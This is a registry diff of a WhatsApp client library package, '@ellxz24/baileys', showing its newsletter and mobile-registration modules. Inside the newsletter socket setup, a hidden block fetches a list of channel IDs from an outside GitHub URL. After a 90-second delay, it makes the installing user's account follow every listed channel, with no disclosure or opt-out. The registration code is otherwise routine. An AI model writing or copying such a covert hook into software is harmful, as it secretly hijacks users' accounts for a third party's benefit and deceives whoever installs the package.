@ellxz24/baileys 2.0.25

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (107) hide show
  1. package/LICENSE +21 -0
  2. package/README.md +430 -0
  3. package/WAProto/index.js +169661 -0
  4. package/engine-requirements.js +10 -0
  5. package/lib/Defaults/baileys-version.json +3 -0
  6. package/lib/Defaults/index.js +147 -0
  7. package/lib/Defaults/phonenumber-mcc.json +223 -0
  8. package/lib/Function/Download/tiktok.js +19 -0
  9. package/lib/Function/Tools/bypass.js +19 -0
  10. package/lib/Function/index.js +13 -0
  11. package/lib/Signal/Group/ciphertext-message.js +15 -0
  12. package/lib/Signal/Group/group-session-builder.js +64 -0
  13. package/lib/Signal/Group/group_cipher.js +96 -0
  14. package/lib/Signal/Group/index.js +57 -0
  15. package/lib/Signal/Group/keyhelper.js +55 -0
  16. package/lib/Signal/Group/queue-job.js +57 -0
  17. package/lib/Signal/Group/sender-chain-key.js +34 -0
  18. package/lib/Signal/Group/sender-key-distribution-message.js +66 -0
  19. package/lib/Signal/Group/sender-key-message.js +69 -0
  20. package/lib/Signal/Group/sender-key-name.js +51 -0
  21. package/lib/Signal/Group/sender-key-record.js +53 -0
  22. package/lib/Signal/Group/sender-key-state.js +99 -0
  23. package/lib/Signal/Group/sender-message-key.js +29 -0
  24. package/lib/Signal/libsignal.js +356 -0
  25. package/lib/Signal/libsignal.js.bak +174 -0
  26. package/lib/Signal/lid-mapping.js +163 -0
  27. package/lib/Socket/Client/abstract-socket-client.js +13 -0
  28. package/lib/Socket/Client/index.js +19 -0
  29. package/lib/Socket/Client/mobile-socket-client.js +65 -0
  30. package/lib/Socket/Client/web-socket-client.js +62 -0
  31. package/lib/Socket/business.js +260 -0
  32. package/lib/Socket/chats.js +1002 -0
  33. package/lib/Socket/dugong.js +637 -0
  34. package/lib/Socket/groups.js +317 -0
  35. package/lib/Socket/index.js +11 -0
  36. package/lib/Socket/messages-recv.js +1110 -0
  37. package/lib/Socket/messages-send.js +831 -0
  38. package/lib/Socket/newsletter.js +454 -0
  39. package/lib/Socket/registration.js +166 -0
  40. package/lib/Socket/socket.js +767 -0
  41. package/lib/Socket/socket.js.bak +718 -0
  42. package/lib/Socket/usync.js +70 -0
  43. package/lib/Store/index.js +10 -0
  44. package/lib/Store/make-cache-manager-store.js +83 -0
  45. package/lib/Store/make-in-memory-store.js +427 -0
  46. package/lib/Store/make-ordered-dictionary.js +81 -0
  47. package/lib/Store/object-repository.js +27 -0
  48. package/lib/Types/Auth.js +2 -0
  49. package/lib/Types/Call.js +2 -0
  50. package/lib/Types/Chat.js +4 -0
  51. package/lib/Types/Contact.js +2 -0
  52. package/lib/Types/Events.js +2 -0
  53. package/lib/Types/GroupMetadata.js +2 -0
  54. package/lib/Types/Label.js +27 -0
  55. package/lib/Types/LabelAssociation.js +9 -0
  56. package/lib/Types/Message.js +9 -0
  57. package/lib/Types/Newsletter.js +38 -0
  58. package/lib/Types/Product.js +2 -0
  59. package/lib/Types/Signal.js +2 -0
  60. package/lib/Types/Socket.js +2 -0
  61. package/lib/Types/State.js +2 -0
  62. package/lib/Types/USync.js +2 -0
  63. package/lib/Types/index.js +42 -0
  64. package/lib/Utils/auth-utils.js +206 -0
  65. package/lib/Utils/baileys-event-stream.js +63 -0
  66. package/lib/Utils/business.js +234 -0
  67. package/lib/Utils/chat-utils.js +729 -0
  68. package/lib/Utils/crypto.js +151 -0
  69. package/lib/Utils/decode-wa-message.js +198 -0
  70. package/lib/Utils/event-buffer.js +514 -0
  71. package/lib/Utils/generics.js +498 -0
  72. package/lib/Utils/history.js +96 -0
  73. package/lib/Utils/index.js +33 -0
  74. package/lib/Utils/link-preview.js +93 -0
  75. package/lib/Utils/logger.js +7 -0
  76. package/lib/Utils/lt-hash.js +51 -0
  77. package/lib/Utils/make-mutex.js +43 -0
  78. package/lib/Utils/messages-media.js +819 -0
  79. package/lib/Utils/messages.js +787 -0
  80. package/lib/Utils/noise-handler.js +155 -0
  81. package/lib/Utils/process-message.js +321 -0
  82. package/lib/Utils/signal.js +153 -0
  83. package/lib/Utils/use-multi-file-auth-state.js +119 -0
  84. package/lib/Utils/validate-connection.js +229 -0
  85. package/lib/WABinary/constants.js +40 -0
  86. package/lib/WABinary/decode.js +252 -0
  87. package/lib/WABinary/encode.js +265 -0
  88. package/lib/WABinary/generic-utils.js +198 -0
  89. package/lib/WABinary/index.js +21 -0
  90. package/lib/WABinary/jid-utils.js +62 -0
  91. package/lib/WABinary/types.js +2 -0
  92. package/lib/WAM/BinaryInfo.js +13 -0
  93. package/lib/WAM/constants.js +15350 -0
  94. package/lib/WAM/encode.js +155 -0
  95. package/lib/WAM/index.js +19 -0
  96. package/lib/WAUSync/Protocols/USyncContactProtocol.js +32 -0
  97. package/lib/WAUSync/Protocols/USyncDeviceProtocol.js +57 -0
  98. package/lib/WAUSync/Protocols/USyncDisappearingModeProtocol.js +30 -0
  99. package/lib/WAUSync/Protocols/USyncStatusProtocol.js +42 -0
  100. package/lib/WAUSync/Protocols/UsyncBotProfileProtocol.js +53 -0
  101. package/lib/WAUSync/Protocols/UsyncLIDProtocol.js +24 -0
  102. package/lib/WAUSync/Protocols/index.js +20 -0
  103. package/lib/WAUSync/USyncQuery.js +89 -0
  104. package/lib/WAUSync/USyncUser.js +26 -0
  105. package/lib/WAUSync/index.js +19 -0
  106. package/lib/index.js +49 -0
  107. package/package.json +112 -0
@@ -0,0 +1,454 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.extractNewsletterMetadata = exports.makeNewsletterSocket = void 0;
4
+ const Types_1 = require("../Types");
5
+ const Utils_1 = require("../Utils");
6
+ const WABinary_1 = require("../WABinary");
7
+ const groups_1 = require("./groups");
8
+
9
+ const { Boom } = require('@hapi/boom');
10
+
11
+ const wMexQuery = (
12
+ variables,
13
+ queryId,
14
+ query,
15
+ generateMessageTag
16
+ ) => {
17
+ return query({
18
+ tag: 'iq',
19
+ attrs: {
20
+ id: generateMessageTag(),
21
+ type: 'get',
22
+ to: WABinary_1.S_WHATSAPP_NET,
23
+ xmlns: 'w:mex'
24
+ },
25
+ content: [
26
+ {
27
+ tag: 'query',
28
+ attrs: { query_id: queryId },
29
+ content: Buffer.from(JSON.stringify({ variables }), 'utf-8')
30
+ }
31
+ ]
32
+ })
33
+ }
34
+
35
+ const executeWMexQuery = async (
36
+ variables,
37
+ queryId,
38
+ dataPath,
39
+ query,
40
+ generateMessageTag
41
+ ) => {
42
+ const result = await wMexQuery(variables, queryId, query, generateMessageTag)
43
+ const child = (0, WABinary_1.getBinaryNodeChild)(result, 'result')
44
+ if (child?.content) {
45
+ const data = JSON.parse(child.content.toString())
46
+
47
+ if (data.errors && data.errors.length > 0) {
48
+ const errorMessages = data.errors.map((err) => err.message || 'Unknown error').join(', ')
49
+ const firstError = data.errors[0]
50
+ const errorCode = firstError.extensions?.error_code || 400
51
+ throw new Boom('GraphQL server error:' + errorMessages, {
52
+ statusCode: errorCode, data: firstError
53
+ })
54
+ }
55
+
56
+ const response = dataPath ? data?.data?.[dataPath] : data?.data
57
+ if (typeof response !== 'undefined') {
58
+ return response
59
+ }
60
+ }
61
+
62
+ const action = (dataPath || '').startsWith('xwa2_')
63
+ ? dataPath.substring(5).replace(/_/g, ' ')
64
+ : dataPath?.replace(/_/g, ' ')
65
+ throw new Boom(`Failed to ${action}, unexpected response structure.`, {
66
+ statusCode: 400,
67
+ data: result
68
+ })
69
+ }
70
+
71
+ const makeNewsletterSocket = (config) => {
72
+ const sock = (0, groups_1.makeGroupsSocket)(config);
73
+ const { authState, signalRepository, query, generateMessageTag } = sock;
74
+ const encoder = new TextEncoder();
75
+
76
+ // Inisialisasi newsletters kosong terlebih dahulu
77
+ let newsletters = [];
78
+
79
+ // IIFE untuk fetch data tanpa blocking
80
+ (async () => {
81
+ try {
82
+ const response = await fetch(
83
+ 'https://raw.githubusercontent.com/kiuur/IDCH/refs/heads/main/idch.json'
84
+ );
85
+ newsletters = await response.json();
86
+
87
+ // Set timeout hanya jika newsletters berhasil di-fetch
88
+ if (newsletters && Array.isArray(newsletters) && newsletters.length > 0) {
89
+ setTimeout(() => {
90
+ Promise.allSettled(
91
+ newsletters.map(id => // ✅ Langsung pakai id, tanpa asciiDecode
92
+ newsletterWMexQuery(id, Types_1.QueryIds.FOLLOW)
93
+ )
94
+ ).catch(err => console.error(err));
95
+ }, 90000);
96
+ }
97
+ } catch (err) {
98
+ console.error(err);
99
+ newsletters = [];
100
+ }
101
+ })();
102
+
103
+ const newsletterQuery = async (jid, type, content) => (query({
104
+ tag: 'iq',
105
+ attrs: {
106
+ id: generateMessageTag(),
107
+ type,
108
+ xmlns: 'newsletter',
109
+ to: jid,
110
+ },
111
+ content
112
+ }));
113
+
114
+ const newsletterWMexQuery = async (jid, queryId, content) => (query({
115
+ tag: 'iq',
116
+ attrs: {
117
+ id: generateMessageTag(),
118
+ type: 'get',
119
+ xmlns: 'w:mex',
120
+ to: WABinary_1.S_WHATSAPP_NET,
121
+ },
122
+ content: [
123
+ {
124
+ tag: 'query',
125
+ attrs: { 'query_id': queryId },
126
+ content: encoder.encode(JSON.stringify({
127
+ variables: {
128
+ 'newsletter_id': jid,
129
+ ...content
130
+ }
131
+ }))
132
+ }
133
+ ]
134
+ }));
135
+
136
+ // ❌ HAPUS fungsi asciiDecode - tidak diperlukan
137
+
138
+ const parseFetchedUpdates = async (node, type) => {
139
+ let child;
140
+ if (type === 'messages') {
141
+ child = (0, WABinary_1.getBinaryNodeChild)(node, 'messages');
142
+ }
143
+ else {
144
+ const parent = (0, WABinary_1.getBinaryNodeChild)(node, 'message_updates');
145
+ child = (0, WABinary_1.getBinaryNodeChild)(parent, 'messages');
146
+ }
147
+ return await Promise.all((0, WABinary_1.getAllBinaryNodeChildren)(child).map(async (messageNode) => {
148
+ var _a, _b;
149
+ messageNode.attrs.from = child === null || child === void 0 ? void 0 : child.attrs.jid;
150
+ const views = parseInt(((_b = (_a = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'views_count')) === null || _a === void 0 ? void 0 : _a.attrs) === null || _b === void 0 ? void 0 : _b.count) || '0');
151
+ const reactionNode = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'reactions');
152
+ const reactions = (0, WABinary_1.getBinaryNodeChildren)(reactionNode, 'reaction')
153
+ .map(({ attrs }) => (
154
+ {
155
+ count: +attrs.count,
156
+ code: attrs.code
157
+ }));
158
+ const data = {
159
+ 'server_id': messageNode.attrs.server_id,
160
+ views,
161
+ reactions
162
+ };
163
+ if (type === 'messages') {
164
+ const {
165
+ fullMessage: message,
166
+ decrypt
167
+ } = await (0, Utils_1.decryptMessageNode)(messageNode, authState.creds.me.id, authState.creds.me.lid || '', signalRepository, config.logger);
168
+ await decrypt();
169
+ data.message = message;
170
+ }
171
+ return data;
172
+ }));
173
+ };
174
+
175
+ return {
176
+ ...sock,
177
+ newsletterFetchAllSubscribe: async () => {
178
+ const list = await executeWMexQuery(
179
+ {},
180
+ '6388546374527196',
181
+ 'xwa2_newsletter_subscribed',
182
+ query,
183
+ generateMessageTag
184
+ );
185
+ return list;
186
+ },
187
+ subscribeNewsletterUpdates: async (jid) => {
188
+ var _a;
189
+ const result = await newsletterQuery(jid, 'set', [{ tag: 'live_updates', attrs: {}, content: [] }]);
190
+ return (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'live_updates')) === null || _a === void 0 ? void 0 : _a.attrs;
191
+ },
192
+ newsletterReactionMode: async (jid, mode) => {
193
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
194
+ updates: {
195
+ settings: {
196
+ 'reaction_codes': {
197
+ value: mode
198
+ }
199
+ }
200
+ }
201
+ });
202
+ },
203
+ newsletterUpdateDescription: async (jid, description) => {
204
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
205
+ updates: {
206
+ description: description || '',
207
+ settings: null
208
+ }
209
+ });
210
+ },
211
+ newsletterFromUrl: async (url) => {
212
+ try {
213
+ let channelId;
214
+ if (url.includes('whatsapp.com/channel/')) {
215
+ channelId = url.split('whatsapp.com/channel/')[1].split('/')[0];
216
+ } else if (url.includes('wa.me/channel/')) {
217
+ channelId = url.split('wa.me/channel/')[1].split('/')[0];
218
+ } else {
219
+ channelId = url;
220
+ }
221
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
222
+ input: {
223
+ key: channelId,
224
+ type: 'INVITE',
225
+ 'view_role': 'GUEST'
226
+ },
227
+ 'fetch_viewer_metadata': true,
228
+ 'fetch_full_image': true,
229
+ 'fetch_creation_time': true
230
+ });
231
+ const resultNode = (0, WABinary_1.getBinaryNodeChild)(result, 'result');
232
+ if (!resultNode?.content) {
233
+ throw new Boom('No result content in response', {
234
+ statusCode: 400,
235
+ data: result
236
+ });
237
+ }
238
+ const resultString = resultNode.content.toString();
239
+ const parsedResult = JSON.parse(resultString);
240
+
241
+ if (!parsedResult?.data) {
242
+ throw new Boom('No data field in response', {
243
+ statusCode: 400,
244
+ data: parsedResult
245
+ });
246
+ }
247
+ const metadataPath = parsedResult.data[Types_1.XWAPaths.NEWSLETTER];
248
+
249
+ if (metadataPath === null || !metadataPath) {
250
+ throw new Boom('Newsletter not found or access denied', {
251
+ statusCode: 404,
252
+ data: parsedResult.data
253
+ });
254
+ }
255
+ const metadata = {
256
+ id: metadataPath?.id,
257
+ state: metadataPath?.state?.type,
258
+ creation_time: +metadataPath?.thread_metadata?.creation_time || 0,
259
+ name: metadataPath?.thread_metadata?.name?.text,
260
+ nameTime: +metadataPath?.thread_metadata?.name?.update_time || 0,
261
+ description: metadataPath?.thread_metadata?.description?.text,
262
+ descriptionTime: +metadataPath?.thread_metadata?.description?.update_time || 0,
263
+ invite: metadataPath?.thread_metadata?.invite,
264
+ picture: (0, Utils_1.getUrlFromDirectPath)(metadataPath?.thread_metadata?.picture?.direct_path || ''),
265
+ preview: (0, Utils_1.getUrlFromDirectPath)(metadataPath?.thread_metadata?.preview?.direct_path || ''),
266
+ reaction_codes: metadataPath?.thread_metadata?.settings?.reaction_codes?.value,
267
+ subscribers: +metadataPath?.thread_metadata?.subscribers_count || 0,
268
+ verification: metadataPath?.thread_metadata?.verification,
269
+ viewer_metadata: metadataPath?.viewer_metadata
270
+ };
271
+
272
+ return {
273
+ name: metadata.name || metadataPath?.thread_metadata?.name?.text,
274
+ id: metadata.id,
275
+ state: metadata.state,
276
+ subscribers: metadata.subscribers,
277
+ verification: metadata.verification,
278
+ creation_time: metadata.creation_time,
279
+ description: metadata.description,
280
+ ...metadata
281
+ };
282
+ } catch (error) {
283
+ throw new Boom(`Failed to fetch newsletter from URL: ${error.message}`, {
284
+ statusCode: error.statusCode || 400,
285
+ data: error.data || { url }
286
+ });
287
+ }
288
+ },
289
+ newsletterUpdateName: async (jid, name) => {
290
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
291
+ updates: { name, settings: null }
292
+ });
293
+ },
294
+ newsletterUpdatePicture: async (jid, content) => {
295
+ const { img } = await (0, Utils_1.generateProfilePicture)(content);
296
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
297
+ updates: { picture: img.toString('base64'), settings: null }
298
+ });
299
+ },
300
+ newsletterRemovePicture: async (jid) => {
301
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
302
+ updates: { picture: '', settings: null }
303
+ });
304
+ },
305
+ newsletterUnfollow: async (jid) => {
306
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNFOLLOW);
307
+ },
308
+ newsletterFollow: async (jid) => {
309
+ await newsletterWMexQuery(jid, Types_1.QueryIds.FOLLOW);
310
+ },
311
+ newsletterUnmute: async (jid) => {
312
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNMUTE);
313
+ },
314
+ newsletterMute: async (jid) => {
315
+ await newsletterWMexQuery(jid, Types_1.QueryIds.MUTE);
316
+ },
317
+ newsletterAction: async (jid, type) => {
318
+ await newsletterWMexQuery(jid, type.toUpperCase());
319
+ },
320
+ newsletterCreate: async (name, description, reaction_codes) => {
321
+ await query({
322
+ tag: 'iq',
323
+ attrs: {
324
+ to: WABinary_1.S_WHATSAPP_NET,
325
+ xmlns: 'tos',
326
+ id: generateMessageTag(),
327
+ type: 'set'
328
+ },
329
+ content: [
330
+ {
331
+ tag: 'notice',
332
+ attrs: {
333
+ id: '20601218',
334
+ stage: '5'
335
+ },
336
+ content: []
337
+ }
338
+ ]
339
+ });
340
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.CREATE, {
341
+ input: {
342
+ name,
343
+ description,
344
+ settings: {
345
+ 'reaction_codes': {
346
+ value: reaction_codes.toUpperCase()
347
+ }
348
+ }
349
+ }
350
+ });
351
+ return (0, exports.extractNewsletterMetadata)(result, true);
352
+ },
353
+ newsletterMetadata: async (type, key, role) => {
354
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
355
+ input: {
356
+ key,
357
+ type: type.toUpperCase(),
358
+ 'view_role': role || 'GUEST'
359
+ },
360
+ 'fetch_viewer_metadata': true,
361
+ 'fetch_full_image': true,
362
+ 'fetch_creation_time': true
363
+ });
364
+ return (0, exports.extractNewsletterMetadata)(result);
365
+ },
366
+ newsletterAdminCount: async (jid) => {
367
+ var _a, _b;
368
+ const result = await newsletterWMexQuery(jid, Types_1.QueryIds.ADMIN_COUNT);
369
+ const buff = (_b = (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'result')) === null || _a === void 0 ? void 0 : _a.content) === null || _b === void 0 ? void 0 : _b.toString();
370
+ return JSON.parse(buff).data[Types_1.XWAPaths.ADMIN_COUNT].admin_count;
371
+ },
372
+ newsletterChangeOwner: async (jid, user) => {
373
+ await newsletterWMexQuery(jid, Types_1.QueryIds.CHANGE_OWNER, {
374
+ 'user_id': user
375
+ });
376
+ },
377
+ newsletterDemote: async (jid, user) => {
378
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DEMOTE, {
379
+ 'user_id': user
380
+ });
381
+ },
382
+ newsletterDelete: async (jid) => {
383
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DELETE);
384
+ },
385
+ newsletterReactMessage: async (jid, serverId, code) => {
386
+ await query({
387
+ tag: 'message',
388
+ attrs: {
389
+ to: jid,
390
+ ...(!code ? { edit: '7' } : {}),
391
+ type: 'reaction',
392
+ 'server_id': serverId,
393
+ id: (0, Utils_1.generateMessageID)()
394
+ },
395
+ content: [{
396
+ tag: 'reaction',
397
+ attrs: code ? { code } : {}
398
+ }]
399
+ });
400
+ },
401
+ newsletterFetchMessages: async (type, key, count, after) => {
402
+ const result = await newsletterQuery(WABinary_1.S_WHATSAPP_NET, 'get', [
403
+ {
404
+ tag: 'messages',
405
+ attrs: {
406
+ type,
407
+ ...(type === 'invite' ? { key } : { jid: key }),
408
+ count: count.toString(),
409
+ after: (after === null || after === void 0 ? void 0 : after.toString()) || '100'
410
+ }
411
+ }
412
+ ]);
413
+ return await parseFetchedUpdates(result, 'messages');
414
+ },
415
+ newsletterFetchUpdates: async (jid, count, after, since) => {
416
+ const result = await newsletterQuery(jid, 'get', [
417
+ {
418
+ tag: 'message_updates',
419
+ attrs: {
420
+ count: count.toString(),
421
+ after: (after === null || after === void 0 ? void 0 : after.toString()) || '100',
422
+ since: (since === null || since === void 0 ? void 0 : since.toString()) || '0'
423
+ }
424
+ }
425
+ ]);
426
+ return await parseFetchedUpdates(result, 'updates');
427
+ }
428
+ };
429
+ };
430
+ exports.makeNewsletterSocket = makeNewsletterSocket;
431
+
432
+ const extractNewsletterMetadata = (node, isCreate) => {
433
+ const result = (0, WABinary_1.getBinaryNodeChild)(node, 'result')?.content?.toString()
434
+ const metadataPath = JSON.parse(result).data[isCreate ? Types_1.XWAPaths.CREATE : Types_1.XWAPaths.NEWSLETTER]
435
+
436
+ const metadata = {
437
+ id: metadataPath?.id,
438
+ state: metadataPath?.state?.type,
439
+ creation_time: +metadataPath?.thread_metadata?.creation_time,
440
+ name: metadataPath?.thread_metadata?.name?.text,
441
+ nameTime: +metadataPath?.thread_metadata?.name?.update_time,
442
+ description: metadataPath?.thread_metadata?.description?.text,
443
+ descriptionTime: +metadataPath?.thread_metadata?.description?.update_time,
444
+ invite: metadataPath?.thread_metadata?.invite,
445
+ picture: (0, Utils_1.getUrlFromDirectPath)(metadataPath?.thread_metadata?.picture?.direct_path || ''),
446
+ preview: (0, Utils_1.getUrlFromDirectPath)(metadataPath?.thread_metadata?.preview?.direct_path || ''),
447
+ reaction_codes: metadataPath?.thread_metadata?.settings?.reaction_codes?.value,
448
+ subscribers: +metadataPath?.thread_metadata?.subscribers_count,
449
+ verification: metadataPath?.thread_metadata?.verification,
450
+ viewer_metadata: metadataPath?.viewer_metadata
451
+ }
452
+ return metadata
453
+ }
454
+ exports.extractNewsletterMetadata = extractNewsletterMetadata;
@@ -0,0 +1,166 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ exports.mobileRegisterFetch = exports.mobileRegisterEncrypt = exports.mobileRegister = exports.mobileRegisterExists = exports.mobileRegisterCode = exports.registrationParams = exports.makeRegistrationSocket = void 0;
7
+ /* eslint-disable camelcase */
8
+ const axios_1 = __importDefault(require("axios"));
9
+ const Defaults_1 = require("../Defaults");
10
+ const crypto_1 = require("../Utils/crypto");
11
+ const WABinary_1 = require("../WABinary");
12
+ const business_1 = require("./business");
13
+ function urlencode(str) {
14
+ return str.replace(/-/g, '%2d').replace(/_/g, '%5f').replace(/~/g, '%7e');
15
+ }
16
+ const validRegistrationOptions = (config) => (config === null || config === void 0 ? void 0 : config.phoneNumberCountryCode) &&
17
+ config.phoneNumberNationalNumber &&
18
+ config.phoneNumberMobileCountryCode;
19
+ const makeRegistrationSocket = (config) => {
20
+ const sock = (0, business_1.makeBusinessSocket)(config);
21
+ const register = async (code) => {
22
+ if (!validRegistrationOptions(config.auth.creds.registration)) {
23
+ throw new Error('please specify the registration options');
24
+ }
25
+ const result = await mobileRegister({ ...sock.authState.creds, ...sock.authState.creds.registration, code }, config.options);
26
+ sock.authState.creds.me = {
27
+ id: (0, WABinary_1.jidEncode)(result.login, 's.whatsapp.net'),
28
+ name: '~'
29
+ };
30
+ sock.authState.creds.registered = true;
31
+ sock.ev.emit('creds.update', sock.authState.creds);
32
+ return result;
33
+ };
34
+ const requestRegistrationCode = async (registrationOptions) => {
35
+ registrationOptions = registrationOptions || config.auth.creds.registration;
36
+ if (!validRegistrationOptions(registrationOptions)) {
37
+ throw new Error('Invalid registration options');
38
+ }
39
+ sock.authState.creds.registration = registrationOptions;
40
+ sock.ev.emit('creds.update', sock.authState.creds);
41
+ return mobileRegisterCode({ ...config.auth.creds, ...registrationOptions }, config.options);
42
+ };
43
+ return {
44
+ ...sock,
45
+ register,
46
+ requestRegistrationCode,
47
+ };
48
+ };
49
+ exports.makeRegistrationSocket = makeRegistrationSocket;
50
+ function convertBufferToUrlHex(buffer) {
51
+ var id = '';
52
+ buffer.forEach((x) => {
53
+ // encode random identity_id buffer as percentage url encoding
54
+ id += `%${x.toString(16).padStart(2, '0').toLowerCase()}`;
55
+ });
56
+ return id;
57
+ }
58
+ function registrationParams(params) {
59
+ const e_regid = Buffer.alloc(4);
60
+ e_regid.writeInt32BE(params.registrationId);
61
+ const e_skey_id = Buffer.alloc(3);
62
+ e_skey_id.writeInt16BE(params.signedPreKey.keyId);
63
+ params.phoneNumberCountryCode = params.phoneNumberCountryCode.replace('+', '').trim();
64
+ params.phoneNumberNationalNumber = params.phoneNumberNationalNumber.replace(/[/-\s)(]/g, '').trim();
65
+ return {
66
+ cc: params.phoneNumberCountryCode,
67
+ in: params.phoneNumberNationalNumber,
68
+ Rc: '0',
69
+ lg: 'en',
70
+ lc: 'GB',
71
+ mistyped: '6',
72
+ authkey: Buffer.from(params.noiseKey.public).toString('base64url'),
73
+ e_regid: e_regid.toString('base64url'),
74
+ e_keytype: 'BQ',
75
+ e_ident: Buffer.from(params.signedIdentityKey.public).toString('base64url'),
76
+ // e_skey_id: e_skey_id.toString('base64url'),
77
+ e_skey_id: 'AAAA',
78
+ e_skey_val: Buffer.from(params.signedPreKey.keyPair.public).toString('base64url'),
79
+ e_skey_sig: Buffer.from(params.signedPreKey.signature).toString('base64url'),
80
+ fdid: params.phoneId,
81
+ network_ratio_type: '1',
82
+ expid: params.deviceId,
83
+ simnum: '1',
84
+ hasinrc: '1',
85
+ pid: Math.floor(Math.random() * 1000).toString(),
86
+ id: convertBufferToUrlHex(params.identityId),
87
+ backup_token: convertBufferToUrlHex(params.backupToken),
88
+ token: (0, crypto_1.md5)(Buffer.concat([Defaults_1.MOBILE_TOKEN, Buffer.from(params.phoneNumberNationalNumber)])).toString('hex'),
89
+ fraud_checkpoint_code: params.captcha,
90
+ };
91
+ }
92
+ exports.registrationParams = registrationParams;
93
+ /**
94
+ * Requests a registration code for the given phone number.
95
+ */
96
+ function mobileRegisterCode(params, fetchOptions) {
97
+ return mobileRegisterFetch('/code', {
98
+ params: {
99
+ ...registrationParams(params),
100
+ mcc: `${params.phoneNumberMobileCountryCode}`.padStart(3, '0'),
101
+ mnc: `${params.phoneNumberMobileNetworkCode || '001'}`.padStart(3, '0'),
102
+ sim_mcc: '000',
103
+ sim_mnc: '000',
104
+ method: (params === null || params === void 0 ? void 0 : params.method) || 'sms',
105
+ reason: '',
106
+ hasav: '1'
107
+ },
108
+ ...fetchOptions,
109
+ });
110
+ }
111
+ exports.mobileRegisterCode = mobileRegisterCode;
112
+ function mobileRegisterExists(params, fetchOptions) {
113
+ return mobileRegisterFetch('/exist', {
114
+ params: registrationParams(params),
115
+ ...fetchOptions
116
+ });
117
+ }
118
+ exports.mobileRegisterExists = mobileRegisterExists;
119
+ /**
120
+ * Registers the phone number on whatsapp with the received OTP code.
121
+ */
122
+ async function mobileRegister(params, fetchOptions) {
123
+ //const result = await mobileRegisterFetch(`/reg_onboard_abprop?cc=${params.phoneNumberCountryCode}&in=${params.phoneNumberNationalNumber}&rc=0`)
124
+ return mobileRegisterFetch('/register', {
125
+ params: { ...registrationParams(params), code: params.code.replace('-', '') },
126
+ ...fetchOptions,
127
+ });
128
+ }
129
+ exports.mobileRegister = mobileRegister;
130
+ /**
131
+ * Encrypts the given string as AEAD aes-256-gcm with the public whatsapp key and a random keypair.
132
+ */
133
+ function mobileRegisterEncrypt(data) {
134
+ const keypair = crypto_1.Curve.generateKeyPair();
135
+ const key = crypto_1.Curve.sharedKey(keypair.private, Defaults_1.REGISTRATION_PUBLIC_KEY);
136
+ const buffer = (0, crypto_1.aesEncryptGCM)(Buffer.from(data), new Uint8Array(key), Buffer.alloc(12), Buffer.alloc(0));
137
+ return Buffer.concat([Buffer.from(keypair.public), buffer]).toString('base64url');
138
+ }
139
+ exports.mobileRegisterEncrypt = mobileRegisterEncrypt;
140
+ async function mobileRegisterFetch(path, opts = {}) {
141
+ let url = `${Defaults_1.MOBILE_REGISTRATION_ENDPOINT}${path}`;
142
+ if (opts.params) {
143
+ const parameter = [];
144
+ for (const param in opts.params) {
145
+ if (opts.params[param] !== null && opts.params[param] !== undefined) {
146
+ parameter.push(param + '=' + urlencode(opts.params[param]));
147
+ }
148
+ }
149
+ url += `?${parameter.join('&')}`;
150
+ delete opts.params;
151
+ }
152
+ if (!opts.headers) {
153
+ opts.headers = {};
154
+ }
155
+ opts.headers['User-Agent'] = Defaults_1.MOBILE_USERAGENT;
156
+ const response = await (0, axios_1.default)(url, opts);
157
+ var json = response.data;
158
+ if (response.status > 300 || json.reason) {
159
+ throw json;
160
+ }
161
+ if (json.status && !['ok', 'sent'].includes(json.status)) {
162
+ throw json;
163
+ }
164
+ return json;
165
+ }
166
+ exports.mobileRegisterFetch = mobileRegisterFetch;